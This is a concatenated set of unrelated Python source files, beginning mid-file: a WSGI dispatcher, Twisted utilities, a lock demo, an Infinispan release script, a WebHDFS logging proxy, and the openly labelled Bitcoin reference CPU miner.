</body>
</html>
"""
if not self.pool:
items = "<li>No active links.</li>"
else:
items = "\n".join(
[
r'<li><a href="{0}">{1}</a></li>'.format(
"/{0}/".format(key)
if self.base_url is None
else "/{0}/{1}/".format(self.base_url, key),
key,
)
for key in self.pool.keys()
]
)
content = Template(body).substitute(list=items)
return content
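# Added commentary: DispatcherApp is a small WSGI dispatcher. register() keys
# each generated Dash app by the Python id() of its context object, and
# __call__ matches the first path segment (optionally behind base_url) with
# app_pattern to pick the app from self.pool; unknown ids get a 400 response,
# "/" renders the link page above, and "/shutdown" stops the gevent WSGIServer
# stored in self.config["server"].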
|
utils.py
|
# -*- coding: utf-8 -*-
import datetime
import json
import functools
import Queue
import six
from twisted.application.service import Service
from twisted.internet import defer
from twisted.python import deprecate
from bouser.excs import SerializableBaseException, ExceptionWrapper
from twisted.web.http import Request
from bouser.web.cors import OptionsFinish
__author__ = 'viruzzz-kun'
class RestJsonEncoder(json.JSONEncoder):
def default(self, o):
if isinstance(o, (datetime.datetime, datetime.date)):
return o.isoformat()
if hasattr(o, '__json__'):
return o.__json__()
if hasattr(o, '__unicode__'):
return o.__unicode__()
if hasattr(o, '__dict__'):
return o.__dict__
return o
def as_json(o):
return json.dumps(o, ensure_ascii=False, cls=RestJsonEncoder, encoding='utf-8').encode('utf-8')
def api_method(func):
@functools.wraps(func)
@defer.inlineCallbacks
def wrapper(*args, **kwargs):
try:
result = yield func(*args, **kwargs)
except OptionsFinish:
# TODO: test it
raise
except SerializableBaseException as e:
result = e
except Exception as e:
result = ExceptionWrapper(e)
if len(args) > 1 and isinstance(args[1], Request):
args[1].setHeader('content-type', 'application/json; charset=utf-8')
defer.returnValue(as_json(result))
return wrapper
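# Hedged usage sketch (added, not part of the original module; the resource
# class and method names below are hypothetical): api_method is meant to
# decorate Twisted web handlers so that normal results, serializable
# exceptions and wrapped unexpected exceptions all come back to the client as
# UTF-8 encoded JSON, with the content-type header set when the second
# positional argument is a Request.
#
#   class PatientResource(object):
#       @api_method
#       def render_GET(self, request):
#           return {'id': 1, 'name': u'test'}   # encoded by as_json()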
def safe_traverse(obj, *args, **kwargs):
"""Безопасное копание вглубь dict'а
@param obj: точка входя для копания
@param *args: ключи, по которым надо проходить
@param default=None: возвращаемое значение, если раскопки не удались
@rtype: any
"""
default = kwargs.get('default', None)
if obj is None:
return default
if len(args) == 0:
raise ValueError(u'len(args) must be > 0')
elif len(args) == 1:
return obj.get(args[0], default)
else:
return safe_traverse(obj.get(args[0]), *args[1:], **kwargs)
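# Illustrative example (added commentary, the values are made up):
#
#   cfg = {'db': {'host': 'localhost'}}
#   safe_traverse(cfg, 'db', 'host')                   # -> 'localhost'
#   safe_traverse(cfg, 'db', 'port', default=5432)     # -> 5432
#   safe_traverse(None, 'db', 'host')                  # -> None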
def must_be_deferred(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
return defer.maybeDeferred(func, *args, **kwargs)
return wrapper
def safe_int(value):
try:
return int(value)
except ValueError:
return value
@deprecate.deprecated
def get_args(request):
"""
:type request: bouser.web.request.BouserRequest
:param request:
:return:
"""
return request.all_args
def transfer_fields(dest, src, fields):
for name in fields:
setattr(dest, name, getattr(src, name))
class ThreadWrapper(Service):
def __init__(self, name=None):
self.q = Queue.Queue()
self.thread = None
self.name = name
def _cb(self, deferred, result):
"""
Callback to be run on deferred function success
This function is run in Thread
:type deferred: twisted.internet.defer.Deferred
:param deferred: Deferred with callback
:param result: result to pass through
:return:
"""
from twisted.internet import reactor
self.q.task_done()
reactor.callFromThread(deferred.callback, result)
return result
def _eb(self, deferred, failure):
"""
Errback to be run on deferred function fail
This function is run in Thread
:type deferred: twisted.internet.defer.Deferred
:param deferred: Deferred with errback
:param failure: failure to pass through
:return:
"""
from twisted.internet import reactor
self.q.task_done()
reactor.callFromThread(deferred.errback, failure)
return failure
def _run(self):
"""
Wrapper's main loop, target of the Thread.
This function is run in Thread
:return:
"""
while 1:
try:
func, args, kwargs, deferred = self.q.get(timeout=1)
except Queue.Empty:
continue
else:
if not func:
self.thread = None
break
defer.maybeDeferred(
func, *args, **kwargs
).addCallbacks(
self._cb, self._eb, callbackArgs=(deferred,), errbackArgs=(deferred,)
)
def call(self, func, *args, **kwargs):
"""
Call function in Thread's call queue
:param func: callable
:return: Deferred which fires when function execution is done
"""
deferred = defer.Deferred()
self.q.put((func, args, kwargs, deferred))
return deferred
def startService(self):
"""
Start ThreadWrapper
:return:
"""
Service.startService(self)
from threading import Thread
        self.thread = Thread(target=self._run, name=self.name)
        self.thread.start()  # launch the worker loop so queued calls are processed
def stopService(self):
"""
Stop ThreadWrapper
:return:
"""
self.q.put((None, None, None, None))
Service.stopService(self)
def synchronize(self, func):
"""
Decorate function to be called inside this ThreadWrapper
:param func: function
:return: decorated function
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
return self.call(func, *args, **kwargs)
return wrapper
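# Hedged usage sketch (added commentary; heavy_query and run_blocking_query
# are hypothetical names): ThreadWrapper funnels calls into a single
# background thread and fires the returned Deferred from the reactor thread.
#
#   wrapper = ThreadWrapper(name='db-worker')
#   wrapper.startService()
#
#   @wrapper.synchronize
#   def heavy_query(sql):
#       return run_blocking_query(sql)     # runs inside the worker thread
#
#   d = heavy_query('SELECT 1')            # Deferred, fires with the result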
def safe_bytes(value):
if isinstance(value, six.text_type):
return value.encode('utf-8', errors='ignore')
elif isinstance(value, six.binary_type):
return value
return str(value)
|
wrap_test.py
|
from functools import wraps
from threading import Thread, Lock
import os
import sys
import time
from pprint import pprint
sys.path.append(os.path.join(os.path.dirname(__file__), ".."))
from lock import a, b
counter = 0
def synchronized(lock):
""" Synchronization decorator. """
def real_wrapper(function):
@wraps(function)
def wrapper(*args, **kwargs):
lock.acquire()
try:
return function(*args, **kwargs)
finally:
lock.release()
return wrapper
return real_wrapper
@synchronized(a.lock)
def worker():
print("a lock engaged:", a.lock.locked())
pprint(globals())
print("\n------------------------------------\n")
print(locals())
a.count += 1
b = 1
time.sleep(0.1)
threads = []
for i in range(2):
t = Thread(target=worker)
threads.append(t)
t.start()
for t in threads:
t.join()
print(a.count)
print(b)
|
release.py
|
#!/usr/bin/python
import re
import sys
import os
import os.path
import subprocess
import shutil
import tempfile
from datetime import *
from multiprocessing import Process
from utils import *
try:
from xml.etree.ElementTree import ElementTree
except:
prettyprint('''
Welcome to the Infinispan Release Script.
This release script requires that you use at least Python 2.5.0. It appears
that you do not have the ElementTree XML APIs available, which are available
by default in Python 2.5.0.
''', Levels.FATAL)
sys.exit(1)
modules = []
uploader = None
git = None
def get_modules(directory):
'''Analyses the pom.xml file and extracts declared modules'''
tree = ElementTree()
f = directory + "/pom.xml"
if settings['verbose']:
print "Parsing %s to get a list of modules in project" % f
tree.parse(f)
mods = tree.findall(".//{%s}module" % maven_pom_xml_namespace)
for m in mods:
modules.append(m.text)
def help_and_exit():
prettyprint('''
Welcome to the Infinispan Release Script.
%s Usage:%s
$ bin/release.py <version> <branch to tag from> <--mvn-only>
%s E.g.,%s
$ bin/release.py 6.1.1.Beta1 %s<-- this will tag off master.%s
$ bin/release.py 6.1.1.Beta1 6.1.x %s<-- this will use the appropriate branch.%s
$ bin/release.py 6.1.1.Beta1 6.1.x --mvn-only %s<-- this will only tag and release to maven (no distribution).%s
''' % (Colors.yellow(), Colors.end_color(), Colors.yellow(), Colors.end_color(), Colors.green(), Colors.end_color(), Colors.green(), Colors.end_color(), Colors.green(), Colors.end_color()), Levels.INFO)
sys.exit(0)
def validate_version(version):
version_pattern = get_version_pattern()
if version_pattern.match(version):
return version.strip()
else:
prettyprint("Invalid version '"+version+"'!\n", Levels.FATAL)
help_and_exit()
def tag_release(version, branch):
if git.remote_branch_exists():
git.switch_to_branch()
git.create_tag_branch()
else:
prettyprint("Branch %s cannot be found on upstream repository. Aborting!" % branch, Levels.FATAL)
sys.exit(100)
def get_project_version_tag(tree):
return tree.find("./{%s}version" % (maven_pom_xml_namespace))
def get_parent_version_tag(tree):
return tree.find("./{%s}parent/{%s}version" % (maven_pom_xml_namespace, maven_pom_xml_namespace))
def get_properties_version_tag(tree):
return tree.find("./{%s}properties/{%s}project-version" % (maven_pom_xml_namespace, maven_pom_xml_namespace))
def write_pom(tree, pom_file):
tree.write("tmp.xml", 'UTF-8')
in_f = open("tmp.xml")
out_f = open(pom_file, "w")
try:
for l in in_f:
newstr = l.replace("ns0:", "").replace(":ns0", "").replace("ns1", "xsi")
out_f.write(newstr)
finally:
in_f.close()
out_f.close()
os.remove("tmp.xml")
if settings['verbose']:
prettyprint(" ... updated %s" % pom_file, Levels.INFO)
def patch(pom_file, version):
'''Updates the version in a POM file. We need to locate //project/parent/version, //project/version and
//project/properties/project-version and replace the contents of these with the new version'''
if settings['verbose']:
prettyprint("Patching %s" % pom_file, Levels.DEBUG)
tree = ElementTree()
tree.parse(pom_file)
need_to_write = False
tags = []
tags.append(get_parent_version_tag(tree))
tags.append(get_project_version_tag(tree))
tags.append(get_properties_version_tag(tree))
for tag in tags:
if tag != None and "-SNAPSHOT" in tag.text:
if settings['verbose']:
prettyprint("%s is %s. Setting to %s" % (str(tag), tag.text, version), Levels.DEBUG)
tag.text=version
need_to_write = True
if need_to_write:
# write to file again!
write_pom(tree, pom_file)
return True
else:
if settings['verbose']:
prettyprint("File doesn't need updating; nothing replaced!", Levels.DEBUG)
return False
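# Illustrative note (added commentary): given a POM fragment such as
#     <version>6.1.1-SNAPSHOT</version>
# patch(pom_file, "6.1.1.Final") only rewrites version tags whose text still
# contains "-SNAPSHOT", so tags that already carry a released version are left
# untouched and the file is written back only when something actually changed.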
def get_poms_to_patch(working_dir):
get_modules(working_dir)
if settings['verbose']:
prettyprint('Available modules are ' + str(modules), Levels.DEBUG)
poms_to_patch = [working_dir + "/pom.xml"]
for m in modules:
poms_to_patch.append(working_dir + "/" + m + "/pom.xml")
# Look for additional POMs that are not directly referenced!
for additionalPom in GlobDirectoryWalker(working_dir, 'pom.xml'):
if additionalPom not in poms_to_patch:
poms_to_patch.append(additionalPom)
return poms_to_patch
def update_versions(base_dir, version):
os.chdir(base_dir)
poms_to_patch = get_poms_to_patch(".")
modified_files = []
for pom in poms_to_patch:
if patch(pom, version):
modified_files.append(pom)
pieces = re.compile('[\.\-]').split(version)
snapshot = pieces[3]=='SNAPSHOT'
final = pieces[3]=='Final'
# Now make sure this goes back into the repository.
git.commit(modified_files, "'Release Script: update versions for %s'" % version)
# And return the next version
if final:
return pieces[0] + '.' + pieces[1] + '.' + str(int(pieces[2])+ 1) + '-SNAPSHOT'
else:
return None
def get_module_name(pom_file):
tree = ElementTree()
tree.parse(pom_file)
return tree.findtext("./{%s}artifactId" % maven_pom_xml_namespace)
def upload_artifacts(dist_dir, version):
"""Artifacts gets rsync'ed to filemgmt.jboss.org, in the downloads_htdocs/infinispan directory"""
tempdir = tempfile.mkdtemp(prefix = '.tmp', dir='.')
os.mkdir("%s/%s" % (tempdir,version))
prettyprint("Copying from %s to %s" % (dist_dir, version), Levels.INFO)
for item in os.listdir(dist_dir):
full_name = "%s/%s" % (dist_dir, item)
if item.strip().lower().endswith(".zip") and os.path.isfile(full_name):
shutil.copy2(full_name, "%s/%s" % (tempdir,version))
uploader.upload_rsync("%s/%s" % (tempdir,version), "infinispan@filemgmt.jboss.org:/downloads_htdocs/infinispan")
shutil.rmtree(tempdir, ignore_errors = True)
def unzip_archive(version):
os.chdir("./distribution/target/distribution")
## Grab the distribution archive and un-arch it
shutil.rmtree("infinispan-%s-all" % version, ignore_errors = True)
if settings['verbose']:
subprocess.check_call(["unzip", "infinispan-%s-all.zip" % version])
else:
subprocess.check_call(["unzip", "-q", "infinispan-%s-all.zip" % version])
def prepare_docs(base_dir, version):
os.chdir("%s/distribution/target/distribution/infinispan-%s-all/docs" % (base_dir, version))
## "Fix" the docs to use the appropriate analytics tracker ID
subprocess.check_call(["%s/bin/updateTracker.sh" % base_dir])
os.mkdir("pdf")
subprocess.check_call(["mvn", "org.apache.maven.plugins:maven-dependency-plugin:2.10:unpack", "-DoutputDirectory=pdf", "-DrepoUrl=https://repository.jboss.org/nexus/content/groups/public-jboss/", "-Dartifact=org.infinispan:infinispan-docs:%s:zip:pdf" % (version)])
def upload_docs(base_dir, version):
"""Javadocs and PDFs get rsync'ed to filemgmt.jboss.org, in the docs_htdocs/infinispan directory"""
version_short = get_version_major_minor(version)
os.mkdir(version_short)
os.rename("api", "%s/apidocs" % version_short)
os.rename("pdf", "%s/pdf" % version_short)
## rsync this stuff to filemgmt.jboss.org
uploader.upload_rsync(version_short, "infinispan@filemgmt.jboss.org:/docs_htdocs/infinispan")
os.chdir(base_dir)
def upload_schema(base_dir, version):
"""Schema gets rsync'ed to filemgmt.jboss.org, in the docs_htdocs/infinispan/schemas and schema_htdoc/infinispan directories"""
os.chdir("%s/distribution/target/distribution/infinispan-%s-all/schema" % (base_dir, version))
    ## rsync this stuff to filemgmt.jboss.org, we put it in the original location (docs/infinispan/schemas) and the new location (schema/infinispan)
uploader.upload_rsync('.', "infinispan@filemgmt.jboss.org:/docs_htdocs/infinispan/schemas")
uploader.upload_rsync('.', "infinispan@filemgmt.jboss.org:/schema_htdocs/infinispan/")
## now the schema docs
version_short = get_version_major_minor(version)
os.chdir("%s/distribution/target/site" % base_dir)
os.mkdir(version_short)
os.rename("configdocs", "%s/configdocs" % version_short)
uploader.upload_rsync(version_short, "infinispan@filemgmt.jboss.org:/docs_htdocs/infinispan")
os.chdir(base_dir)
def do_task(target, args, async_processes):
if settings['multi_threaded']:
async_processes.append(Process(target = target, args = args))
else:
target(*args)
### This is the starting place for this script.
def release():
global settings
global uploader
global git
assert_python_minimum_version(2, 5)
require_settings_file()
# We start by determining whether the version passed in is a valid one
if len(sys.argv) < 2:
help_and_exit()
base_dir = os.getcwd()
version = validate_version(sys.argv[1])
branch = "master"
mvn_only = False
if len(sys.argv) > 2:
if sys.argv[2].startswith("--mvn-only"):
mvn_only = True
else:
branch = sys.argv[2]
if len(sys.argv) > 3:
if sys.argv[3].startswith("--mvn-only"):
mvn_only = True
else:
prettyprint("Unknown argument %s" % sys.argv[3], Levels.WARNING)
help_and_exit()
prettyprint("Releasing Infinispan version %s from branch '%s'" % (version, branch), Levels.INFO)
sure = input_with_default("Are you sure you want to continue?", "N")
if not sure.upper().startswith("Y"):
prettyprint("... User Abort!", Levels.WARNING)
sys.exit(1)
prettyprint("OK, releasing! Please stand by ...", Levels.INFO)
## Set up network interactive tools
if settings['dry_run']:
# Use stubs
prettyprint("*** This is a DRY RUN. No changes will be committed. Used to test this release script only. ***", Levels.DEBUG)
prettyprint("Your settings are %s" % settings, Levels.DEBUG)
uploader = DryRunUploader()
else:
uploader = Uploader()
git = Git(branch, version)
if not git.is_upstream_clone():
proceed = input_with_default('This is not a clone of an %supstream%s Infinispan repository! Are you sure you want to proceed?' % (Colors.UNDERLINE, Colors.END), 'N')
if not proceed.upper().startswith('Y'):
prettyprint("... User Abort!", Levels.WARNING)
sys.exit(1)
## Make sure we don't include un-needed content in the release
prettyprint("Step 1: Cleaning up working directory (un-tracked and modified files)", Levels.INFO)
git.clean_release_directory()
prettyprint("Step 1: Complete", Levels.INFO)
## Release order:
# Step 1: Tag in Git
prettyprint("Step 2: Tagging %s in git as %s" % (branch, version), Levels.INFO)
tag_release(version, branch)
prettyprint("Step 2: Complete", Levels.INFO)
# Step 2: Update version in tagged files
prettyprint("Step 3: Updating version number in source files", Levels.INFO)
version_next = update_versions(base_dir, version)
prettyprint("Step 3: Complete", Levels.INFO)
# Step 3: Build and test
prettyprint("Step 4: Build and test", Levels.INFO)
maven_build_distribution(version)
prettyprint("Step 4: Complete", Levels.INFO)
if not mvn_only:
async_processes = []
##Unzip the newly built archive now
unzip_archive(version)
# Step 4: Update javadoc Google Analytics tracker
prettyprint("Step 5: Prepare docs", Levels.INFO)
prepare_docs(base_dir, version)
prettyprint("Step 5: Complete", Levels.INFO)
# Step 5: Upload docs to FTP
prettyprint("Step 6: Uploading docs", Levels.INFO)
do_task(upload_docs, [base_dir, version], async_processes)
prettyprint("Step 6: Complete", Levels.INFO)
prettyprint("Step 7: Uploading Artifacts", Levels.INFO)
do_task(upload_artifacts, ["%s/distribution/target/distribution" % base_dir, version], async_processes)
do_task(upload_artifacts, ["%s/as-modules/client/target/distribution" % base_dir, version], async_processes)
do_task(upload_artifacts, ["%s/as-modules/embedded/target/distribution" % base_dir, version], async_processes)
do_task(upload_artifacts, ["%s/server/integration/target/distribution" % base_dir, version], async_processes)
prettyprint("Step 7: Complete", Levels.INFO)
prettyprint("Step 8: Uploading to configuration XML schema", Levels.INFO)
do_task(upload_schema, [base_dir, version], async_processes)
prettyprint("Step 8: Complete", Levels.INFO)
## Wait for processes to finish
for p in async_processes:
p.start()
for p in async_processes:
p.join()
## Tag the release
git.tag_for_release()
step_no=9
if mvn_only:
step_no=5
# Switch back to the branch being released
git.switch_to_branch()
# Update to next version
if version_next is not None:
prettyprint("Step %s: Updating version number for next release" % step_no, Levels.INFO)
update_versions(base_dir, version_next)
prettyprint("Step %s: Complete" % step_no, Levels.INFO)
if not settings['dry_run']:
git.push_tag_to_origin()
if version_next is not None:
git.push_branch_to_origin()
git.cleanup()
else:
prettyprint("In dry-run mode. Not pushing tag to remote origin and not removing temp release branch %s." % git.working_branch, Levels.DEBUG)
prettyprint("\n\n\nDone! Now all you need to do is the remaining post-release tasks as outlined in https://mojo.redhat.com/docs/DOC-60994", Levels.INFO)
if __name__ == "__main__":
release()
|
servers.py
|
import SocketServer
import mitm
class SimpleTCPServer(SocketServer.TCPServer):
def start_foreground(self):
self.serve_forever()
class ThreadedTCPServer(SocketServer.ThreadingTCPServer):
daemon_threads = mitm.KILL_THREADS_WHEN_MAIN_ENDS
def start_background(self):
mitm.Thread(target=self.serve_forever).start()
def start_foreground(self):
self.serve_forever()
|
webhdfs_proxy.py
|
#!/usr/bin/python3 -u
import threading
import time
import subprocess
import json
import http.server
import http.client
import urllib.parse
class ChunkedWriter:
def __init__(self, wfile):
self.wfile = wfile
def write(self, data):
self.wfile.write(f'{len(data):x}\r\n'.encode())
self.wfile.write(data)
self.wfile.write('\r\n'.encode())
def close(self):
self.wfile.write('0\r\n\r\n'.encode())
logging_lock = threading.Lock()
logging_file = None
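# Upstream HDFS NameNode (9870) and DataNode (9864) HTTP ports, plus the local
# ports this proxy listens on for NameNode and DataNode traffic. hdfs_ip
# defaults to the qflock-storage hostname; it can instead be resolved from the
# Docker network via get_storage_ip() below.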
hdfs_nn_port = 9870
hdfs_dn_port = 9864
proxy_nn_port = 9860
proxy_dn_port = 9859
hdfs_ip = 'qflock-storage'
total_bytes = 0
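# Proxies WebHDFS GET requests to the real NameNode, logging each path and the
# running byte count. 307 redirects to a DataNode are rewritten so the Location
# header points at this proxy's DataNode port instead of the real one.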
class NNRequestHandler(http.server.BaseHTTPRequestHandler):
def log_message(self, format, *args):
pass
    def log(self, msg):
        # Serialize log writes from the NN and DN handler threads.
        with logging_lock:
            print(msg)
            logging_file.write(msg + '\n')
            logging_file.flush()
def send_hdfs_request(self):
conn = http.client.HTTPConnection(f'{hdfs_ip}:{hdfs_nn_port}')
conn.request("GET", self.path, '', self.headers)
response = conn.getresponse()
data = response.read()
conn.close()
return response, data
def do_GET(self):
return self.forward_to_hdfs()
def forward_to_hdfs(self):
global total_bytes
resp, data = self.send_hdfs_request()
total_bytes += len(data)
self.log(f'"NN", "{self.path}", {len(data)}, {total_bytes} ')
self.send_response(resp.status, resp.reason)
transfer_encoding = None
for h in resp.headers.items():
if h[0] == 'Transfer-Encoding':
transfer_encoding = h[1]
            if h[0] == 'Location' and resp.status == 307:  # Temporary redirect to a DataNode
                # Rewrite the DataNode port in the redirect so the follow-up
                # GET is also routed through this proxy.
                location = h[1].replace(f':{hdfs_dn_port}', f':{proxy_dn_port}', 1)
                # print(location)
                self.send_header(h[0], location)
else:
self.send_header(h[0], h[1])
self.end_headers()
if transfer_encoding == 'chunked':
writer = ChunkedWriter(self.wfile)
writer.write(data)
writer.close()
else:
self.wfile.write(data)
self.wfile.flush()
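# Same forwarding and byte-count logging as NNRequestHandler, but for requests
# that land on the DataNode proxy port; headers are passed through unchanged.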
class DNRequestHandler(http.server.BaseHTTPRequestHandler):
def log_message(self, format, *args):
pass
    def log(self, msg):
        # Serialize log writes from the NN and DN handler threads.
        with logging_lock:
            print(msg)
            logging_file.write(msg + '\n')
            logging_file.flush()
def send_hdfs_request(self):
conn = http.client.HTTPConnection(f'{hdfs_ip}:{hdfs_dn_port}')
conn.request("GET", self.path, '', self.headers)
response = conn.getresponse()
data = response.read()
conn.close()
return response, data
def do_GET(self):
return self.forward_to_hdfs()
def forward_to_hdfs(self):
global total_bytes
resp, data = self.send_hdfs_request()
total_bytes += len(data)
self.log(f'"DN", "{self.path}", {len(data)}, {total_bytes} ')
self.send_response(resp.status, resp.reason)
transfer_encoding = None
for h in resp.headers.items():
if h[0] == 'Transfer-Encoding':
transfer_encoding = h[1]
self.send_header(h[0], h[1])
self.end_headers()
if transfer_encoding == 'chunked':
writer = ChunkedWriter(self.wfile)
writer.write(data)
writer.close()
else:
self.wfile.write(data)
self.wfile.flush()
def start_server(port, handler):
server = http.server.HTTPServer(('0.0.0.0', port), handler)
try:
server.serve_forever()
except KeyboardInterrupt:
pass
server.server_close()
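# Looks up the qflock-storage container's address on the qflock-net Docker
# network via `docker network inspect`, for use as hdfs_ip when the hostname
# is not resolvable from this process.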
def get_storage_ip():
result = subprocess.run('docker network inspect qflock-net'.split(' '), stdout=subprocess.PIPE)
d = json.loads(result.stdout)
for c in d[0]['Containers'].values():
print(c['Name'], c['IPv4Address'].split('/')[0])
if c['Name'] == 'qflock-storage':
return c['IPv4Address'].split('/')[0]
return None
if __name__ == '__main__':
logging_file = open('webhdfs_proxy.log', 'w')
# hdfs_ip = get_storage_ip()
print(f'Listening to ports:{proxy_nn_port}, {proxy_dn_port} HDFS:{hdfs_ip}')
# start_server(proxy_nn_port, NNRequestHandler)
    # Serve NameNode requests on a daemon thread; DataNode requests run in the foreground.
    nn_thread = threading.Thread(target=start_server, args=(proxy_nn_port, NNRequestHandler), daemon=True)
    nn_thread.start()
start_server(proxy_dn_port, DNRequestHandler)
logging_file.close()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
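# Minimal JSON-RPC 1.1 client for bitcoind, using HTTP Basic auth over a
# persistent httplib connection; only getblockcount and getwork are wrapped.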
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
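# Byte-order helpers for getwork data: bytereverse swaps the byte order of a
# 32-bit word, bufreverse applies that swap to every 4-byte word in a buffer,
# and wordreverse reverses the order of the 4-byte words themselves.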
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
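# One Miner per worker process: the first 76 bytes of the block header are
# pre-hashed once, then each candidate nonce is appended and double-SHA256'd.
# A cheap check that the top 32 bits of the hash are zero filters candidates
# before the full comparison against the 256-bit target; max_nonce is rescaled
# after each pass so one scan takes roughly settings['scantime'] seconds.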
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
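# Config file format: one key=value per line, '#' starts a comment. Recognized
# keys: host, port, rpcuser, rpcpass, threads, hashmeter, scantime (rpcuser and
# rpcpass are required). One worker process is launched per configured thread.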
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 8800
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|